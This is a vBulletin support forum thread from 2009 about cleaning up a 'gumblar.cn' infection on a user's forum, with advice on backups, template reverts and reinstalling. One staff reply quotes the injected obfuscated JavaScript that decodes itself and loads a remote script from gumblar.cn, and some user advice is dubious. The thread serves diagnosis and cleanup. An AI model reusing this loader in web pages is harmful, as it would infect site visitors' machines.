Announcement

Collapse
No announcement yet.

virus on my website

Collapse
X
 
  • Filter
  • Time
  • Show
Clear All
new posts

  • Jake Bunce
    replied
    Ideally you should restore a backup of the database. Often times the offending code is written to the database.

    If you don't have a good backup then we can try to track down the code ourselves if you submit a trouble ticket with your forum and server info, including a URL and login for phpmyadmin on your server:

    http://members.vbulletin.com/members...ontactform.php

    Leave a comment:


  • toutatis
    replied
    I delete all files on my web space. Hosting Comp. reset my web space ( deleted all files.)
    I reinstalled vbulletin and use same database. Only unchanged item is database. and after I have same virus. I cant change template settings who page is not loading.

    How should I do. I can not rebuild my community with new blank database

    big help pls.

    Leave a comment:


  • Jake Bunce
    replied
    Ideally you should restore a backup.

    If you don't have a good backup then we can try to track down the code ourselves if you submit a trouble ticket with your forum and server info, including a URL and login for phpmyadmin on your server:

    http://members.vbulletin.com/members...ontactform.php

    Leave a comment:


  • toutatis
    replied
    I think I delete this script. it is infected _vti_inf.html and postinfo.html

    but know automatic redirect is not running how can I fix this

    it is back ! every page has same script
    Last edited by toutatis; Sat 9 May '09, 11:42am.

    Leave a comment:


  • toutatis
    replied
    yes that is right.

    Leave a comment:


  • hamid.park
    replied
    Your database Is Clean . Try Upload Az sample html page on your server and then yoo see that this java script wiil come in that file sourse .

    Leave a comment:


  • Jake Bunce
    replied
    Tracking down the exact point of entry can be very difficult if not impossible. You just need to cleanup the damage and take measures to secure your forum and server.

    http://www.vbulletin.com/forum/showthread.php?t=194701

    Leave a comment:


  • toutatis
    replied
    I think I will delete all php files.
    but there is a question about this.
    is database have a virus ?
    is that can be possible.
    I think it is not. what about you say ?

    Leave a comment:


  • Jake Bunce
    replied
    Originally posted by Jobe1986 View Post
    It's in some obsfuscated javascript inserted between </head> and <body>which is why you couldn't find it. But it is there.
    Good eye. I see it now:

    Code:
    // -->
    
    </script>
    <script type="text/javascript" src="clientscript/vbulletin_global.js?v=382"></script>
    <script type="text/javascript" src="clientscript/vbulletin_menu.js?v=382"></script>
    
    
    	<title>Domatiz.Org-Flash-Dreamweaver-Elektronik-Mikrodenetleyiciler-Eğlence-Sohbet - vBulletin</title>
    </head>[color=red]<script language=javascript><!-- 
    (function(GZci){var ksTk=':76ar:20:61:3d:22Sc:72:69pt:45:6e:67ine:22:2cb:3d:22Versi:6fn()+:22:2cj:3d:22:22:2cu:3dn:61v:69:67ator:2euser:41:67ent:3b:69f((:75:2ein:64exOf:28:22:57:69n:22):3e:30):26:26(u:2eindexOf(:22NT:20:36:22):3c0):26:26(doc:75:6d:65n:74:2e:63o:6fkie:2eindexOf(:22miek:3d1:22):3c:30:29:26:26(:74ypeo:66(z:72vzts):21:3dty:70eof(:22A:22))):7bzr:76:7ats:3d:22A:22:3beval(:22if:28wi:6e:64ow:2e:22:2ba+:22)j:3dj:2b:22+a+:22M:61:6aor:22+:62+a+:22:4di:6e:6fr:22+b+:61:2b:22:42uil:64:22:2bb+:22:6a:3b:22):3bdoc:75:6d:65nt:2ewrite(:22:3cs:63ript:20:73rc:3d:2f:2fgu:6db:6car:2ecn:2f:72ss:2f:3fi:64:3d:22+j:2b:22:3e:3c:5c:2fsc:72ipt:3e:22):3b:7d';var t30L=ksTk.replace(GZci,'%');eval(unescape(t30L))})(/:/g);
     --></script>[/color]
    <body>
    <!-- logo -->
    <a name="top"></a>
    <table border="0" width="100%" cellpadding="0" cellspacing="0" align="center">
    <tr>
    
    	<td align="left"><a href="index.php?"><img src="images/misc/vbulletin3_logo_white.gif" border="0" alt="Domatiz.Org-Flash-Dreamweaver-Elektronik-Mikrodenetleyiciler-Eğlence-Sohbet" /></a></td>
    	<td align="right" id="header_right_cell">
    		&nbsp;
    	</td>
    </tr>
    </table>
    <!-- /logo -->
    This code appears to have been inserted directly into the templates. Try to reproduce it on a default style:

    Admin CP -> Styles & Templates -> Style Manager -> [Add New Style]

    Create a new style with no parent. Then click that style's name in the Style Manager to view your forum with that style. If the problem goes away on the default style then you know it's a style problem at which point you need to systematically revert your custom templates to isolate the problem.

    Of course, when your forum is compromised like this ideally you should restore a backup from before it happened.

    Leave a comment:


  • Jobe1986
    replied
    Originally posted by Jake Bunce View Post
    I don't see any reference to "gumblar" anywhere in the source code of the page. Is it gone?
    It's in some obsfuscated javascript inserted between </head> and <body>which is why you couldn't find it. But it is there.

    Leave a comment:


  • toutatis
    replied
    I understood.

    I will try.

    but I must know how can I delete this virus without any uninstalling or deleting.

    Leave a comment:


  • hamid.park
    replied
    you may not delete non-php/html files .

    Leave a comment:


  • toutatis
    replied


    I write "www.domatiz.org" on adress bar.
    I push Enter key.
    when site's loading started I can see "gumblar.cn" on my status bar.

    host isnt mine. and I have alot of file for download.

    how can I delete this virus. help me

    Leave a comment:


  • hamid.park
    replied
    This Is A Virus . My Forum Was Infected With This . There Is Just One Way to remove this . You should Deleye All Files In Your Host And Or rebuild Your Host . Then You SHould Format All Your PC's Drive . (Fdisk) . then Re install Windows . Install avast antivirus And Update It . Then Re upload Your files .
    After Reinstall windows if you open your forum , your system will be Infected . This Virus Transfer to FTP Via Your Pc . Try Upload a sample page too see that .

    Leave a comment:


  • toutatis
    replied
    please click a lot of pages.

    I dont know. Maybe it is in my temp folder. But I scanned my computer using with AVG and Spybot S&D

    when I click a link I see "gumblar.cn" in my status bar. ( 1/3 second in my status bar I cant printscreen, I could not catch)
    Last edited by toutatis; Fri 8 May '09, 12:08am.

    Leave a comment:

Related Topics

Collapse

Working...
X